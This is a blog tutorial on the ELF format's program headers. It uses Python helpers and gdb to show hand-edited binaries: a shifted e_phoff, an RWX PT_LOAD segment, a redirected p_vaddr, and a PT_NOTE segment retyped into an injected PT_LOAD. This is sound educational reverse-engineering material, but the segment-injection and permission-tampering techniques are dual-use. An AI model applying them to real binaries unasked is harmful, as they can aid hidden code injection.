<li><a href="http://openpowerfoundation.org/wp-content/uploads/resources/leabi/content/dbdoclet.50655241_97607.html%C2%A0">http://openpowerfoundation.org/wp-content/uploads/resources/leabi/content/dbdoclet.50655241_97607.html </a></li>
<li><a href="https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions">https://dmz-portal.mips.com/wiki/MIPS_ELF_header_definitions</a></li>
<li><a href="https://greek0.net/elf.html">https://greek0.net/elf.html </a></li>
</ol>
</div>
<div>
<br /></div>
<div>
<br /></div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-74759936625889367702018-09-14T00:20:00.001-07:002018-09-14T01:00:49.693-07:00Introduction to the ELF Format Part II : Understanding Program Headers <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Welcome back folks! In the <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">previous post</a> I covered pretty much the most trivial parts of the ELF file format. In this post we are going to work with one of the most interesting mechanisms in the file: the program headers! I skipped some parts of the ELF header in the previous post and decided to cover them here, specifically because they inform the program headers anyway. Let's get started!<br />
<h2 style="text-align: left;">
Introduction : What are Program Headers?</h2>
<br />
I mentioned in <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">part 1</a> that the ELF format performs two tasks: it is a recipe for sublimating dead files into living processes, and it adds the bells and whistles needed to make the file look pretty to gdb, the dynamic loader and a bunch of other tools. Program headers (<i>among other functions</i>) are mostly for telling the memory loader where to put stuff. They also have some housekeeping functions.<br />
<br />
We'll get into how these memory loading powers and formats work a little later; for now it's just important to keep in mind a good idea of what these fields are for.<br />
<br />
<h2 style="text-align: left;">
ELF Header continued</h2>
The ELF header covered in the previous post holds some fields specific to the program headers:<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> - indicates the offset in the file where the start of the program headers (<i>technically speaking this "needs" to always point to a PHDR section but that's not entirely true - stay tuned!</i>) </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_phentsize</span> - indicates the byte size of program header entries</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">e_phnum</span> - indicates the number of program header entries</li>
</ul>
<div>
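These fields are presumably used to logically limit traversal of the headers: start at <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> and read <span style="font-family: "courier new" , "courier" , monospace;">e_phnum</span> entries of <span style="font-family: "courier new" , "courier" , monospace;">e_phentsize</span> bytes each.<br />
Let's take a look at what program headers look like in some raw hex:</div>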
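That traversal is easy to sketch in Python. This assumes a little-endian ELF64 file, where each <span style="font-family: "courier new" , "courier" , monospace;">Elf64_Phdr</span> is 56 (0x38) bytes; the type names cover only a few common <span style="font-family: "courier new" , "courier" , monospace;">PT_*</span> values, and <span style="font-family: "courier new" , "courier" , monospace;">program_header_types</span> is a hypothetical helper.<br />

```python
import struct

# Elf64_Phdr: p_type, p_flags (4 bytes each) then p_offset, p_vaddr, p_paddr,
# p_filesz, p_memsz, p_align (8 bytes each): 56 (0x38) bytes, little-endian.
PHDR_FMT = "<IIQQQQQQ"
PT_NAMES = {0: "NULL", 1: "LOAD", 2: "DYNAMIC", 3: "INTERP", 4: "NOTE", 6: "PHDR"}


def program_header_types(data: bytes) -> list:
    """List each program header's p_type, walking the table exactly as the
    e_phoff, e_phentsize and e_phnum header fields describe it."""
    (phoff,) = struct.unpack_from("<Q", data, 0x20)               # e_phoff
    phentsize, phnum = struct.unpack_from("<HH", data, 0x36)      # e_phentsize, e_phnum
    types = []
    for i in range(phnum):
        fields = struct.unpack_from(PHDR_FMT, data, phoff + i * phentsize)
        types.append(PT_NAMES.get(fields[0], hex(fields[0])))
    return types
```

Because the walk trusts <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> blindly, changing that one field changes which headers a parser sees, which is exactly the experiment below.<br />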
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWiCzMg6xX9YzTX4JlU2EmSjt807TV3dFiwkfRrPB7a0cKnCnA9VAdFNm2fGuXvE5oMVG34zob4eDlFCweI_h-VB02ss-6RFal9IIAaT2W83EjMhavWdB_0ZZkiPrUPr0AcJmoVq44aII/s1600/ELF+Program+Headers+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="682" data-original-width="914" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWiCzMg6xX9YzTX4JlU2EmSjt807TV3dFiwkfRrPB7a0cKnCnA9VAdFNm2fGuXvE5oMVG34zob4eDlFCweI_h-VB02ss-6RFal9IIAaT2W83EjMhavWdB_0ZZkiPrUPr0AcJmoVq44aII/s1600/ELF+Program+Headers+%25282%2529.png" /></a></div>
<br />
<br />
<i>I had to block out part of my terminal when I made this because I sometimes run a .bashrc that displays some network stuff in my terminal prompt. </i></div>
<div>
<br />
<div>
If you want to check out the program headers of an ELF file, this is the magic command you need:<br />
<blockquote class="tr_bq">
<br />
readelf -l ./compile.elf </blockquote>
<br /></div>
<div>
<div style="margin: 0px;">
As a fun experiment we can play with the <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> field to make the program skip some of the program headers. Right now the program headers start at <span style="font-family: "courier new" , "courier" , monospace;">0x40</span>, which is 64 bytes into the file. <i>They usually start there, right after the 64-byte ELF header</i>, but there's no strict reason they need to! Let's see what happens if we shift the <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> address down by one program header.<br />
<br />
So the first program header appears at <span style="font-family: "courier new" , "courier" , monospace;">0x40</span> and the next one (the <span style="font-family: "courier new" , "courier" , monospace;">INTERP</span> segment) at <span style="font-family: "courier new" , "courier" , monospace;">0x78</span>, which is exactly <span style="font-family: "courier new" , "courier" , monospace;">0x38 = 56</span> bytes further on, matching the <span style="font-family: "courier new" , "courier" , monospace;">e_phentsize</span> field in the ELF header.</div>
<div style="margin: 0px;">
<br />
Editing the raw binary so that <span style="font-family: "courier new" , "courier" , monospace;">e_phoff</span> points to <span style="font-family: "courier new" , "courier" , monospace;">0x78</span> results in this readelf output:</div>
<div style="margin: 0px;">
<br /></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6z5JHeRVABy7FAB8sL0FvyKPa1EHIk86-l2xzOPbaY7EiTjaNUu9EHHwFl2V2VHIGb2mG_0KCTPk3FyPygm4F-0BDBngPzp36FjjsT1gUVJnWWuPai9h-w5_4YzmFWOOYUoKgDNToPX0/s1600/E_PHOFF+displacement.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="882" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6z5JHeRVABy7FAB8sL0FvyKPa1EHIk86-l2xzOPbaY7EiTjaNUu9EHHwFl2V2VHIGb2mG_0KCTPk3FyPygm4F-0BDBngPzp36FjjsT1gUVJnWWuPai9h-w5_4YzmFWOOYUoKgDNToPX0/s1600/E_PHOFF+displacement.png" style="cursor: move;" /></a></div>
</div>
<br />
<br /></div>
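If you'd rather script the e_phoff edit than hexedit it, something like the following Python sketch should do it. It assumes a 64-bit little-endian ELF (e_phoff at 0x20, e_phentsize at 0x36, e_phnum at 0x38), and the helper name is hypothetical. Unlike the manual edit described above, it also decrements e_phnum (my own assumption about what you'd usually want) so readers don't walk one entry past the end of the original table.

```python
import struct

E_PHOFF = 0x20      # offset of e_phoff in an ELF64 header
E_PHENTSIZE = 0x36  # offset of e_phentsize
E_PHNUM = 0x38      # offset of e_phnum

def skip_first_program_header(elf: bytearray) -> None:
    """Advance e_phoff by one entry so readers start at the second header.

    Assumes a 64-bit little-endian ELF and edits the buffer in place.
    Also decrements e_phnum so the table does not run past its original end.
    """
    (phoff,) = struct.unpack_from("<Q", elf, E_PHOFF)
    phentsize, phnum = struct.unpack_from("<HH", elf, E_PHENTSIZE)
    if phnum == 0:
        raise ValueError("no program headers to skip")
    struct.pack_into("<Q", elf, E_PHOFF, phoff + phentsize)
    struct.pack_into("<H", elf, E_PHNUM, phnum - 1)
```

Work on a copy: read the file into a bytearray, call skip_first_program_header on it, write the result to a new file (a hypothetical compile_skipped.elf, say) and run readelf -l on that.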
<div>
You might wonder whether this ELF still runs without its PHDR program header. YES! At least for this sample, nobody cares about your PHDR program header!<br />
<br />
There are several types of program header, each with a different purpose:<br />
<ol style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00000006 PT_PHDR</span> - gives the location and size of the program header table itself. According to the documentation it may only appear if the table is part of the memory image, and if present it must precede any loadable segment entry. More interesting for us: it isn't even needed for the ELF to run (<i>at least for the sample I'm using here! Of course you may be running on a system or architecture that actually takes this entry seriously</i>).</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00000003 PT_INTERP</span> - gives the location of a NUL-terminated path name of the program that will be invoked as the interpreter of the ELF. It is only meaningful for executables. You can try pointing this to other programs to see what happens :)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">0x00000001 PT_LOAD</span> - the most important program header type. It describes a portion of the file that must be placed in memory. In this context the other attributes of the program header take on a slightly more specific meaning (<i>see below how <span style="font-family: "courier new" , "courier" , monospace;">p_vaddr</span>, <span style="font-family: "courier new" , "courier" , monospace;">p_paddr</span> etc. are explained in the context of <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span></i>)</li>
</ol>
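A small lookup table helps when poking at p_type values. The sketch below is my own; the numeric values come from the ELF specification plus the common GNU extensions, while the fallback labels for unknown values are made up and won't match readelf's wording exactly.

```python
# p_type values from the ELF specification plus common GNU extensions
PT_NAMES = {
    0: "PT_NULL",
    1: "PT_LOAD",
    2: "PT_DYNAMIC",
    3: "PT_INTERP",
    4: "PT_NOTE",
    5: "PT_SHLIB",
    6: "PT_PHDR",
    7: "PT_TLS",
    0x6474E550: "PT_GNU_EH_FRAME",
    0x6474E551: "PT_GNU_STACK",
    0x6474E552: "PT_GNU_RELRO",
}

def p_type_name(p_type: int) -> str:
    """Name a p_type value, falling back to its reserved range if unknown."""
    if p_type in PT_NAMES:
        return PT_NAMES[p_type]
    if 0x60000000 <= p_type <= 0x6FFFFFFF:   # PT_LOOS .. PT_HIOS
        return f"OS-specific ({p_type:#x})"
    if 0x70000000 <= p_type <= 0x7FFFFFFF:   # PT_LOPROC .. PT_HIPROC
        return f"processor-specific ({p_type:#x})"
    return f"unknown ({p_type:#x})"
```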
<div>
<span style="font-family: "courier new" , "courier" , monospace;">PT_INTERP</span> is a little unusual in that it points to a region of the file that exists just to hold a string: the path of the program meant to interpret the file (<i>this is why ours points to ld-linux, the dynamic loader</i>).<br />
<br />
Here's what this actually looks like in the raw hex:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77-zUnNikthYSz5XKLd8wMKSgi02_oiur4FS3dWVazIzNDNpDp-O8uD8ux1889MEcypq3er2rdns0EwN8yIKEYsaSqfqxeViWlBNqAFsCdwNuTAUQfJlCO0B7A67YSfOsgjlu1D5O51s/s1600/PT_INTERPT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="683" data-original-width="686" height="636" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi77-zUnNikthYSz5XKLd8wMKSgi02_oiur4FS3dWVazIzNDNpDp-O8uD8ux1889MEcypq3er2rdns0EwN8yIKEYsaSqfqxeViWlBNqAFsCdwNuTAUQfJlCO0B7A67YSfOsgjlu1D5O51s/s640/PT_INTERPT.png" width="640" /></a></div>
<br />
<br />
There are a number of other program header types; I've only expanded on a few of the most important ones for this post. It's best to check out the documentation if you want to grasp the full range of <span style="font-family: "courier new" , "courier" , monospace;">p_type</span> values.<br />
<br />
Beyond the type, each program header has a few more attributes. These are important to understand if you're going to pull off the PT_LOAD wizardry later on in the post.</div>
</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">p_offset</span> - the offset into the ELF file where this segment's content begins. Later on we will point this value to different places. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_vaddr</span> - the virtual address that this segment will be mapped to, should it be mapped into memory (again this only really applies to PT_LOAD type headers)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_paddr</span> - the segment's physical address, for systems where physical addressing is relevant. The specification leaves its contents unspecified for executables and shared objects.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_filesz</span> - the size of the segment in the file; basically tells the loader how many bytes to suck out of the ELF.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_memsz</span> - the size of the segment in memory. This may be larger than <span style="font-family: "courier new" , "courier" , monospace;">p_filesz</span>, in which case the extra bytes are zero-filled (this is how .bss gets its space).</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_flags</span> - the permissions under which this segment will be mapped (should it be mapped into memory)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">p_align</span> - the alignment of the segment in the file and in memory. Loadable segments must have <span style="font-family: "courier new" , "courier" , monospace;">p_vaddr</span> congruent to <span style="font-family: "courier new" , "courier" , monospace;">p_offset</span> modulo the page size. For a proper explanation please see the documentation.<i> </i></li>
</ul>
</div>
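Putting the fields together, here's a hedged Python sketch that unpacks one 64-bit little-endian program header and, for a PT_INTERP entry, follows p_offset and p_filesz to the interpreter path. Note that in ELF64 p_flags is the second field (in ELF32 it comes after p_memsz), so the on-disk order differs from the list above. The class and function names are hypothetical.

```python
import struct
from typing import NamedTuple

class Elf64Phdr(NamedTuple):
    p_type: int
    p_flags: int
    p_offset: int
    p_vaddr: int
    p_paddr: int
    p_filesz: int
    p_memsz: int
    p_align: int

# ELF64 on-disk order, little-endian: 4 + 4 + 6 * 8 = 56 bytes per entry
PHDR_FMT = "<IIQQQQQQ"
PT_INTERP = 3

def read_phdr(elf: bytes, offset: int) -> Elf64Phdr:
    """Unpack one 56-byte ELF64 program header starting at `offset`."""
    return Elf64Phdr(*struct.unpack_from(PHDR_FMT, elf, offset))

def interpreter_path(elf: bytes, phdr: Elf64Phdr) -> str:
    """Return the NUL-terminated path that a PT_INTERP entry points at."""
    if phdr.p_type != PT_INTERP:
        raise ValueError("not a PT_INTERP entry")
    raw = elf[phdr.p_offset:phdr.p_offset + phdr.p_filesz]
    return raw.split(b"\0", 1)[0].decode()
```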
<div>
So just to recap: each program header has these <span style="font-family: "courier new" , "courier" , monospace;">p_*</span> fields, but whether the <span style="font-family: "courier new" , "courier" , monospace;">p_type</span> is <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> decides whether the <i>content described by</i> the program header will actually end up as part of the memory image. The emphasis is there because sometimes (<i>since the kernel maps the file in page-sized chunks</i>) the entire header table can end up in memory anyway.<br />
<br />
Moving on, for interest's sake we should fiddle with some <span style="font-family: "courier new" , "courier" , monospace;">p_type</span> values and see what happens.<br />
<br /></div>
<div>
If we throw some crazy bytes at the program header type field, readelf spits out some interesting stuff:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiefG6FWfPsKcJGPDBDHEo-PfPQHFpKh9sPocwarZPhrpwqZD8zxfCIqnpHRRpR6C4ryLlHr8rjeZ6-bQlZVffiln37POK89TWYsoICUwEgXI2AeM9kUHndQzVxGJlvKHfzQj8wcCIkr50/s1600/Screenshot+from+2018-09-12+23-48-28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="186" data-original-width="1400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiefG6FWfPsKcJGPDBDHEo-PfPQHFpKh9sPocwarZPhrpwqZD8zxfCIqnpHRRpR6C4ryLlHr8rjeZ6-bQlZVffiln37POK89TWYsoICUwEgXI2AeM9kUHndQzVxGJlvKHfzQj8wcCIkr50/s1600/Screenshot+from+2018-09-12+23-48-28.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq4xdzcmoHTZFkMC5ph6wX8xKU6WhRu-FPmNhGL7BPu4IPTSXLBTu2Riw_j9ysggTie9sucQUPNndUo8UgSsVBRS8XPQxHWE7PIIUddqBPutY6VxU92EkpJWNZhSmqL_V1yNlRgkT0m-8/s1600/Screenshot+from+2018-09-12+23-48-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="258" data-original-width="1395" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq4xdzcmoHTZFkMC5ph6wX8xKU6WhRu-FPmNhGL7BPu4IPTSXLBTu2Riw_j9ysggTie9sucQUPNndUo8UgSsVBRS8XPQxHWE7PIIUddqBPutY6VxU92EkpJWNZhSmqL_V1yNlRgkT0m-8/s1600/Screenshot+from+2018-09-12+23-48-11.png" /></a></div>
<div>
<br /></div>
<div>
<br />
There are a couple more types to explore, some of which can be neat places to stuff things you need during an exploit. Either way it's great to get to know the full set of behaviors the file is capable of; this way we can learn to describe more epic exploits with it!<br />
<br />
Okay, so <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> commands must be pretty interesting to mess around with, so let's get that going next.<br />
<br />
<h2 style="text-align: left;">
PT_LOAD commands</h2>
<br />
As covered above, <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> commands tell the loader what to put where, and with which permissions. Let's try something simple that won't immediately affect execution but will let us see the effect of our influence on the file. A good candidate is flipping some bits in the segment's <span style="font-family: "courier new" , "courier" , monospace;">p_flags</span> field.<br />
The flags are pretty easy to spot in raw hex. Here's me setting the permissions on a <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> segment to full read, write and execute. The permission bits are <span style="font-family: "courier new" , "courier" , monospace;">PF_X = 0x1</span> (execute), <span style="font-family: "courier new" , "courier" , monospace;">PF_W = 0x2</span> (write) and <span style="font-family: "courier new" , "courier" , monospace;">PF_R = 0x4</span> (read) (<i>please see the documentation for the full spec</i>), so we are going to give it the value <span style="font-family: "courier new" , "courier" , monospace;">0x07</span>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEQ4nh2XQuVhi4AjvmU2vSzt2xadl5KVrMabQoA0Vm-yPTdq9cXJMTE0ufrIgm3RP4bLl9wQzK4kbiQGB2AqWj2iAlwZ3lFyVWy876nTRASlfcUuaGPbgIqC5gxIbsqvBX7oG4CaZn7k/s1600/PT_INTERP2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="368" data-original-width="918" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfEQ4nh2XQuVhi4AjvmU2vSzt2xadl5KVrMabQoA0Vm-yPTdq9cXJMTE0ufrIgm3RP4bLl9wQzK4kbiQGB2AqWj2iAlwZ3lFyVWy876nTRASlfcUuaGPbgIqC5gxIbsqvBX7oG4CaZn7k/s1600/PT_INTERP2.png" /></a></div>
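The same flag edit can be scripted. This Python sketch (hypothetical helper names, ELF64 little-endian assumed) writes a new p_flags value into a program header, relying on p_flags sitting 4 bytes into each ELF64 entry, and renders flags in a style that mimics readelf's Flags column.

```python
import struct

PF_X, PF_W, PF_R = 0x1, 0x2, 0x4  # p_flags permission bits

def flags_str(p_flags: int) -> str:
    """Render p_flags like readelf's Flags column, e.g. 'R E' or 'RW '."""
    return "".join([
        "R" if p_flags & PF_R else " ",
        "W" if p_flags & PF_W else " ",
        "E" if p_flags & PF_X else " ",
    ])

def set_phdr_flags(elf: bytearray, phdr_offset: int, p_flags: int) -> None:
    """Overwrite p_flags of the ELF64 program header at phdr_offset.

    In ELF64, p_flags is the 4-byte field right after the 4-byte p_type.
    """
    struct.pack_into("<I", elf, phdr_offset + 4, p_flags)
```

For example, set_phdr_flags(data, offset, PF_R | PF_W | PF_X) writes the 0x07 used above, where offset is the file offset of the PT_LOAD entry you want to change.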
<br />
If we're going to understand how things end up in memory from the interpretation of the ELF file we need to confirm our projections by looking at actual memory.<br />
<br />
This is pretty easy to do on Linux: the <span style="font-family: "courier new" , "courier" , monospace;">/proc/[PID]/maps</span> file prints the current memory map (<i>which gives you a good summary of where things are, what permissions they have, etc.</i>). In addition, we can fiddle with some <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> commands and then poke around in the process's memory using gdb. Here's the general methodology for testing <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> options and confirming them:<br />
<br />
<ol style="text-align: left;">
<li>Mangle the headers as above</li>
<li>Open the file in gdb using `<span style="font-family: "courier new" , "courier" , monospace;">gdb ./compile_me.elf</span>`</li>
<li>Set a breakpoint on <span style="font-family: "courier new" , "courier" , monospace;">_start</span>. Execution should still reach _start, since all that involves is pointing <span style="font-family: "courier new" , "courier" , monospace;">rip</span> there once the program is loaded and, uhm, well, letting it RIP!</li>
<li>Once the breakpoint triggers, ask gdb what the process ID is (<span style="font-family: "courier new" , "courier" , monospace;">info proc</span> prints it)</li>
<li>Using the process ID from step 4, look up the memory map in <span style="font-family: "courier new" , "courier" , monospace;">/proc/PID/maps</span></li>
</ol>
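If you want to check the mapping programmatically, this Python sketch parses /proc/[PID]/maps text into records; the Mapping type and the parse_maps name are my own. gdb can also show the same information directly with info proc mappings.

```python
from typing import NamedTuple, Optional

class Mapping(NamedTuple):
    start: int
    end: int
    perms: str           # e.g. "rwxp": read, write, exec, private/shared
    path: Optional[str]  # None for anonymous mappings

def parse_maps(text: str) -> list[Mapping]:
    """Parse the contents of /proc/[PID]/maps into Mapping records."""
    maps = []
    for line in text.splitlines():
        # Fields: address perms offset dev inode [pathname]
        fields = line.split(maxsplit=5)
        if len(fields) < 5:
            continue
        start, end = (int(x, 16) for x in fields[0].split("-"))
        path = fields[5] if len(fields) == 6 else None
        maps.append(Mapping(start, end, fields[1], path))
    return maps
```

For example, with the PID from gdb, [m for m in parse_maps(open(f"/proc/{pid}/maps").read()) if m.perms.startswith("rwx")] lists the full-permission mappings.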
<div>
The following screenshot shows how this is done:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWuYug67L92OfyD4BtfsTI4KPCp7KclWC8yIHfFDDxhmG2pkRpIKtrilfVi2TTKQtHqeP4DAv9puhNlqpxdynvkQn1Z2_EK5m607A10zdQHq5eCpFXqvH7LXKxSUSxqZ5PVL7xaywPGQ/s1600/changing+memory+permissions.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="429" data-original-width="903" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyWuYug67L92OfyD4BtfsTI4KPCp7KclWC8yIHfFDDxhmG2pkRpIKtrilfVi2TTKQtHqeP4DAv9puhNlqpxdynvkQn1Z2_EK5m607A10zdQHq5eCpFXqvH7LXKxSUSxqZ5PVL7xaywPGQ/s1600/changing+memory+permissions.png" /></a></div>
<div>
<br /></div>
<br />
And there you have it: the memory really is mapped with this crazy full-permission setting!<br />
<br /></div>
<div>
<h2 style="text-align: left;">
Redirecting PT_LOADs</h2>
<br />
Okay, so we can definitely change permissions, but can we change the address of a segment in the actual memory image? Sure! Here's me doing that:<br />
<br />
<ol style="text-align: left;">
<li>hexedit the <span style="font-family: "courier new" , "courier" , monospace;">p_vaddr</span> of the first <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> segment in the ELF file</li>
<li>open the binary in gdb</li>
<li>break point on <span style="font-family: "courier new" , "courier" , monospace;">_start</span></li>
<li>pop open the memory map</li>
</ol>
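A scripted version of step 1 might look like this. It is a sketch under assumptions: ELF64 little-endian, 4 KiB pages, hypothetical helper names, and like the post it only touches p_vaddr. It also refuses addresses that break the specification's rule that loadable segments have p_vaddr congruent to p_offset modulo the page size.

```python
import struct

PT_LOAD = 1

def first_pt_load(elf: bytes) -> int:
    """Return the file offset of the first PT_LOAD entry (ELF64, little-endian)."""
    (phoff,) = struct.unpack_from("<Q", elf, 0x20)
    phentsize, phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(phnum):
        off = phoff + i * phentsize
        (p_type,) = struct.unpack_from("<I", elf, off)
        if p_type == PT_LOAD:
            return off
    raise ValueError("no PT_LOAD entry found")

def set_vaddr(elf: bytearray, phdr_offset: int, vaddr: int,
              page_size: int = 0x1000) -> None:
    """Point p_vaddr (at +0x10 in an ELF64 entry) at a new address."""
    (p_offset,) = struct.unpack_from("<Q", elf, phdr_offset + 0x08)
    # The spec requires p_vaddr and p_offset to agree modulo the page size
    if (vaddr - p_offset) % page_size:
        raise ValueError("p_vaddr must equal p_offset modulo the page size")
    struct.pack_into("<Q", elf, phdr_offset + 0x10, vaddr)
```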
<div>
You should be able to see something like this:</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAZ66B2zibyAjJgxxPEnQuKQo4quSrlYXPVL4tTwa3EzI9ZXsv02vpzPax3xjCcVdrb6KvrHdDc9CE5fkyTn-VrG0p1gfzmEL6Vrpi_hcZGdQGH5khyrPCPt8SAV5xkBmLUYa3TAtINM/s1600/PT_LOAD+8000.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="877" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirAZ66B2zibyAjJgxxPEnQuKQo4quSrlYXPVL4tTwa3EzI9ZXsv02vpzPax3xjCcVdrb6KvrHdDc9CE5fkyTn-VrG0p1gfzmEL6Vrpi_hcZGdQGH5khyrPCPt8SAV5xkBmLUYa3TAtINM/s1600/PT_LOAD+8000.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Of course this doesn't really execute; it dies just after <span style="font-family: "courier new" , "courier" , monospace;">_start</span> gets executed:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBNiwZpFDut8xJOWTY6n31FeUF0_mA9ea2vkC-d-7J1KLQTBa7wZo1atXZ_LMjVurCQkjRsfeVArEpBU9uZe8B7zACDDiMCl9-ZeDN5i5rgJrGYncZPPT-SmkGHqQI6rqcG2A7KQ4wfY4/s1600/Screenshot+from+2018-09-13+23-30-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBNiwZpFDut8xJOWTY6n31FeUF0_mA9ea2vkC-d-7J1KLQTBa7wZo1atXZ_LMjVurCQkjRsfeVArEpBU9uZe8B7zACDDiMCl9-ZeDN5i5rgJrGYncZPPT-SmkGHqQI6rqcG2A7KQ4wfY4/s1600/Screenshot+from+2018-09-13+23-30-47.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
We can also inject an extra <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span> command. An easy way to do this is to rewrite the type of an existing program header. Try using the <span style="font-family: "courier new" , "courier" , monospace;">PT_NOTE</span> segment, since it is pretty much ignored for our purposes. So here's me retyping the <span style="font-family: "courier new" , "courier" , monospace;">PT_NOTE</span> into an injected <span style="font-family: "courier new" , "courier" , monospace;">PT_LOAD</span>:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_gWlCwJ0I4OhbDIR9lqSkG2Dn-yVv2o5AMws-AcD7nn_UWYxhnAQTX-kAz6741XrlXTCkvExJniIdmIpX6ReyAhJk7dlYN24Extdb154jgk-1mtpCubIQD4NmTml7z_FwAeliRpUWSL8/s1600/Screenshot+from+2018-09-13+23-41-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="605" data-original-width="1410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_gWlCwJ0I4OhbDIR9lqSkG2Dn-yVv2o5AMws-AcD7nn_UWYxhnAQTX-kAz6741XrlXTCkvExJniIdmIpX6ReyAhJk7dlYN24Extdb154jgk-1mtpCubIQD4NmTml7z_FwAeliRpUWSL8/s1600/Screenshot+from+2018-09-13+23-41-34.png" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
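Retyping the note can also be scripted. This Python sketch (hypothetical helper name, ELF64 little-endian assumed) flips the first PT_NOTE's p_type to PT_LOAD and leaves every other field alone; depending on what you want mapped, you will probably also need to adjust p_offset, p_vaddr, p_filesz, p_memsz and p_flags. Keep in mind the specification expects PT_LOAD entries to appear in ascending p_vaddr order.

```python
import struct

PT_LOAD, PT_NOTE = 1, 4

def retype_note_as_load(elf: bytearray) -> int:
    """Turn the first PT_NOTE entry into a PT_LOAD; return its file offset.

    Assumes ELF64 little-endian. Only p_type is changed here.
    """
    (phoff,) = struct.unpack_from("<Q", elf, 0x20)
    phentsize, phnum = struct.unpack_from("<HH", elf, 0x36)
    for i in range(phnum):
        off = phoff + i * phentsize
        if struct.unpack_from("<I", elf, off)[0] == PT_NOTE:
            struct.pack_into("<I", elf, off, PT_LOAD)
            return off
    raise ValueError("no PT_NOTE entry to repurpose")
```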
<div>
This runs perfectly! Here's me confirming this in gdb; I've also included the live memory map:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
